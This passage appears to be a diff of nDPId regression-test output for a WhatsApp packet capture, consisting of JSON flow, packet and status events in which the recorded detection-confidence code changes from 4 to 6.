00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655071203961,"flow_last_seen":1655071203961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655071203961,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1655071203961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655071203961,"pkt":"eJS0JASgYDjgxTWgCABFAAA8rm1AAD8GU9TAqAJkszzDMdb+FGbxdk6iAAAAAKAC\/\/+sqwAAAgQFtAQCCApIWe4BAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1655071203990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655071203990,"pkt":"eJS0JASgYDjgxTWgCABFAAA0rm5AAD8GU9vAqAJkszzDMdb+FGbxdk6jUznIyYAQAVd2AQAAAQEICkhZ7h+G1MEa"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1655071203998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655071203998,"pkt":"eJS0JASgYDjgxTWgCABFAAA4rm9AAD8GU9bAqAJkszzDMdb+FGbxdk6jUznIyYAYAVcwqAAAAQEICkhZ7ieG1MEaRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071203961,"flow_last_seen":1655071204028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655071204028,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071203961,"flow_last_seen":1655071204028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655071204028,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":55038,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655071204543,"flow_last_seen":1655071204543,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655071204543,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1655071204543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655071204543,"pkt":"eJS0JASgYDjgxTWgCABFAAA8pS5AAD8GbkLAqAJkHw1GMti0FGbC7URPAAAAAKAC\/\/\/+SAAAAgQFtAQCCAqV4ZcxAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1655071204704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655071204704,"pkt":"eJS0JASgYDjgxTWgCABFAAA0pS9AAD8GbknAqAJkHw1GMti0FGbC7URQktIbLIAQAVeaBwAAAQEICpXhl9HVew2N"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1655071204709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655071204709,"pkt":"eJS0JASgYDjgxTWgCABFAAA4pTBAAD8GbkTAqAJkHw1GMti0FGbC7URQktIbLIAYAVdUsQAAAQEICpXhl9bVew2NRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071204543,"flow_last_seen":1655071204870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655071204870,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655071204543,"flow_last_seen":1655071204870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655071204870,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.70.50","src_port":55476,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":374,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":374,"packets-processed":373,"total-skipped-flows":0,"total-l4-payload-len":30706,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":47,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":47,"total-idle-flows":35,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":306,"global_ts_msec":1655073402411} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655073402411,"flow_last_seen":1655073402411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655073402411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1655073402411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655073402411,"pkt":"eJS0JASgYDjgxTWgCABFAAA8dBJAAD8Gji\/AqAJkszzDMb2aFGahzCxlAAAAAKAC\/\/+a8AAAAgQFtAQCCApxUGIQAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1655073402445,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655073402445,"pkt":"eJS0JASgYDjgxTWgCABFAAA0dBNAAD8GjjbAqAJkszzDMb2aFGahzCxmjLLTN4AQAICpvAAAAQEICnFQYjPQSe8a"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1655073402465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655073402465,"pkt":"eJS0JASgYDjgxTWgCABFAAA4dBRAAD8GjjHAqAJkszzDMb2aFGahzCxmjLLTN4AYAIBkWAAAAQEICnFQYkbQSe8aRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655073402411,"flow_last_seen":1655073402498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655073402498,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655064434682,"flow_last_seen":1655064435041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655065264797,"flow_last_seen":1655065265368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655065885451,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655073402411,"flow_last_seen":1655073402498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655073402498,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655064434682,"flow_last_seen":1655064435041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655065264797,"flow_last_seen":1655065265368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655065885451,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1655073402833,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":382,"packets-processed":381,"total-skipped-flows":0,"total-l4-payload-len":30991,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":48,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":48,"total-idle-flows":39,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":316,"global_ts_msec":1655074111508} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655074111508,"flow_last_seen":1655074111508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655074111508,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1655074111508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655074111508,"pkt":"eJS0JASgYDjgxTWgCABFAAA8DYdAAD8G9LrAqAJkszzDMbMaFGYrB92KAAAAAKAC\/\/+Y9QAAAgQFtAQCCAo4NG1HAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1655074111556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655074111556,"pkt":"eJS0JASgYDjgxTWgCABFAAA0DYhAAD8G9MHAqAJkszzDMbMaFGYrB92LuiGK2IAQAIABZwAAAQEICjg0bW5hoB8L"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1655074111565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655074111565,"pkt":"eJS0JASgYDjgxTWgCABFAAA4DYlAAD8G9LzAqAJkszzDMbMaFGYrB92LuiGK2IAYAIC8AwAAAQEICjg0bYBhoB8LRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074111508,"flow_last_seen":1655074111606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655074111606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074111508,"flow_last_seen":1655074111606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655074111606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655074455881,"flow_last_seen":1655074455881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655074455881,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1655074455881,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655074455881,"pkt":"eJS0JASgYDjgxTWgCABFAAA8sLNAAD8GUZ7AqAJkszzDIaZ+FGbSFVW5AAAAAKAC\/\/\/0VAAAAgQFtAQCCAoGIjFpAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1655074455913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655074455913,"pkt":"eJS0JASgYDjgxTWgCABFAAA0sLRAAD8GUaXAqAJkszzDIaZ+FGbSFVW6wmRwfoAQAKwXRAAAAQEICgYiMYo6n51\/"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1655074455915,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655074455915,"pkt":"eJS0JASgYDjgxTWgCABFAAA4sLVAAD8GUaDAqAJkszzDIaZ+FGbSFVW6wmRwfoAYAKzR8QAAAQEICgYiMYs6n51\/RUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074455881,"flow_last_seen":1655074455915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655074455915,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074455881,"flow_last_seen":1655074455915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655074455915,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655074681295,"flow_last_seen":1655074681295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655074681295,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1655074681295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655074681295,"pkt":"eJS0JASgYDjgxTWgCABFAAA81rZAAD8GK4vAqAJkszzDMeNWFGYDhPITAAAAAKAC\/\/\/bRgAAAgQFtAQCCApIjv1aAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1655074681328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655074681328,"pkt":"eJS0JASgYDjgxTWgCABFAAA01rdAAD8GK5LAqAJkszzDMeNWFGYDhPIU+mPdyoAQAVfaOgAAAQEICkiO\/XvslGmN"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1655074681508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655074681508,"pkt":"eJS0JASgYDjgxTWgCABFAAA41rhAAD8GK43AqAJkszzDMeNWFGYDhPIU+mPdyoAYAVeUNgAAAQEICkiO\/i7slGmNRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074681295,"flow_last_seen":1655074681541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655074681541,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074681295,"flow_last_seen":1655074681541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655074681541,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": 